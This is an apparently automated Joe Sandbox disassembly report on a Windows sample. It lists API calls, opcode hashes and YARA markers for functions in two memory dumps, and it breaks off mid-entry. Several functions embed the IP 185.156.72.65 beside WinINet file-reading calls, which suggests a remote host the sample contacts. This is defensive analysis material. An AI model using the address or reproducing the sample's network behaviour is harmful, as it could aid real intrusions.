                                                    Similarity
                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 2112829910-0
                                                    • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                                                    • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                                                    • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                                                    • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                                                    APIs
                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04951C6C
                                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04951C8F
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileInternet$PointerRead
                                                    • String ID:
                                                    • API String ID: 3197321146-0
                                                    • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                                                    • Instruction ID: eb7b93129c0bd39a399fa667d664963be0dca8c4f381e32a02064f17c29549db
                                                    • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                                                    • Instruction Fuzzy Hash: E2C14B70900218DFEB24DF64CC85BE9B7B9EF49304F2041E9E909A72A0D775BA84CF95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                                                    • Instruction ID: 5cc4e608ba870c86061b251413a45c7d5df544701d674f89a2be05a2e5113e03
                                                    • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                                                    • Instruction Fuzzy Hash: AE51A2B2601606AFEB29DF14D889BBA77A9EF40314F38453DDE054B6B0E731B954CB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                                                    • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                                                    • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                                                    • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                                                    APIs
                                                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                                                    • GetLastError.KERNEL32 ref: 049677AF
                                                    • __dosmaperr.LIBCMT ref: 049677B6
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 049677F0
                                                    • __dosmaperr.LIBCMT ref: 049677F7
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 1913693674-0
                                                    • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                    • Instruction ID: 89fbce9ef6911b3f7a181470303265efeba8fc05d8566701dc68da8c1070cfd8
                                                    • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                    • Instruction Fuzzy Hash: 1E216271600605AFEB11EFA598C0C6BB7ADFF842AC7108579E91B97250E735FC50CBA0
                                                    APIs
                                                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                                                    • GetLastError.KERNEL32 ref: 00417548
                                                    • __dosmaperr.LIBCMT ref: 0041754F
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                                                    • __dosmaperr.LIBCMT ref: 00417590
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 1913693674-0
                                                    • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                    • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                                                    • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                                    • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                    • Instruction ID: df6395ff5d616979d49be4c64c05c387649a92e6d41db2ca51b23fd16f764d07
                                                    • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                    • Instruction Fuzzy Hash: E6218E71204205AFAB20EF659C8197AB7AEEF842A87108935F91BDB160E730FC4087A0
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                    • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                                                    • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                    • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,049636EF,0495381E,?,00000000,04952AA0,04952AA2,?,04963868,00000022,00420B0C,00422950,00422958,04952AA0), ref: 049636A1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                    • Instruction ID: 067c916b0eb0639cacaf8424bae5b75bf55862140bc37f4bcbf575502e0cae7c
                                                    • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                    • Instruction Fuzzy Hash: 6B21D231B01610BBCB319F65EC42B9A3B6D9B427A4B254235ED07A73A1EB30FD05C6D4
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 049686F4
                                                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496872C
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496874C
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 158306478-0
                                                    • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                    • Instruction ID: feb1a02ec53880696c5514432aa90a6bf02a22c72f3534a569fecb4c0ca89810
                                                    • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                    • Instruction Fuzzy Hash: 0611C4B66125197E77217B765CC8CAF3DADCEC91A87010534F90792100FA60FE0282B6
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                                                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 158306478-0
                                                    • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                    • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                                                    • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                    • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000), ref: 0496CEA6
                                                    • GetLastError.KERNEL32(?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000,?,0496A2C8,?), ref: 0496CEB2
                                                      • Part of subcall function 0496CE78: CloseHandle.KERNEL32(0042CA30,0496CEC2,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000), ref: 0496CE88
                                                    • ___initconout.LIBCMT ref: 0496CEC2
                                                      • Part of subcall function 0496CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0496CE69,0496CAF3,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CE4D
                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CED7
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                    • Instruction ID: 525149c5109c89400660402c7a5a91214a4283679d32bd0e85d18a4c906a30fe
                                                    • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                    • Instruction Fuzzy Hash: 18F0AC36540158BBCF225F95EC08A9A7F36FF496A1B458030FA5A96120D732AC219BD4
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                                                    • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                                                      • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                                                    • ___initconout.LIBCMT ref: 0041CC5B
                                                      • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                    • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                                                    • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                    • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                                                    APIs
                                                    • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                                                    • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                                                    • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                                                    • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                    • String ID:
                                                    • API String ID: 3269011525-0
                                                    • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                                    • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                                                    • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                                    • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorHandling__start
                                                    • String ID: pow
                                                    • API String ID: 3213639722-2276729525
                                                    • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                                    • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                                                    • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                                    • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                                                    APIs
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                                    • String ID: vector too long
                                                    • API String ID: 3646673767-2873823879
                                                    • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                                                    • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                                                    • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                                                    • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: http://
                                                    • API String ID: 0-1121587658
                                                    • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                                                    • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                                                    • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                                                    • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94
                                                    APIs
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0495BAA6
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0495BB5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 3480331319-1018135373
                                                    • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                    • Instruction ID: 0e7c3944bde18a15751221af0c1f39edf172653e307827899b3639b505ec047c
                                                    • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                    • Instruction Fuzzy Hash: 6C41A134E00219AFDF10DF68C884AAEBBF5AF45328F248175EC14AB365D771BA05CB91
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0495C32C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                    • Instruction ID: 469ca81cc88efd7d276d9fe38d2634b47bf2dc2cc48431cd51c1df6cbec78555
                                                    • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                    • Instruction Fuzzy Hash: BD412872900209AFDF16DF98C981EEEBBB9BF48304F248169FD15A7225D335A950DF50
                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                    • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                                                    • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                    • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                                                    APIs
                                                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                                                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                                                    • __Init_thread_footer.LIBCMT ref: 0495150B
                                                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                                                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: 185.156.72.65$185.156.72.65
                                                    • API String ID: 4132704954-2656946096
                                                    • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                                                    • Instruction ID: b68f67b4c00690e181e770163d78a84ca3d00b31a65fe517a41e0cacc1b0a450
                                                    • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                                                    • Instruction Fuzzy Hash: 6521D4B4F002059AEB24EFB8E9157A87BB0AF05308FA141B9C9239B2B1D7756506CB59
                                                    APIs
                                                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                                                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                                                    • __Init_thread_footer.LIBCMT ref: 049512EB
                                                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                                                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: 185.156.72.65$185.156.72.65
                                                    • API String ID: 4132704954-2656946096
                                                    • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                                                    • Instruction ID: 9e702a3d0036c6607689573dba1b7483ecbe6d04646fe19d8000a92ab8bf8a80
                                                    • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                                                    • Instruction Fuzzy Hash: 5A2137B0F00245DEEB14EFA8E9167A87BB0EB01308FA00179D84567360D7B56549CB5D
                                                    APIs
                                                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                                                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                                                    • __Init_thread_footer.LIBCMT ref: 049513FB
                                                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                                                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: 185.156.72.65$185.156.72.65
                                                    • API String ID: 4132704954-2656946096
                                                    • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                                                    • Instruction ID: a02c709b0203582cfdba942107a8ff52fd0862dd8be4265b390dd0447ed87fa5
                                                    • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                                                    • Instruction Fuzzy Hash: 9321F5B0F00244DAEB24EFA4E9257A87BB0EF41308FA002B9DC055B260D7B56545CB59
                                                    APIs
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 00401084
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: 185.156.72.65$185.156.72.65
                                                    • API String ID: 2296764815-2656946096
                                                    • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                                                    • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                                                    • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                                                    • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                                                    APIs
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 00401194
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
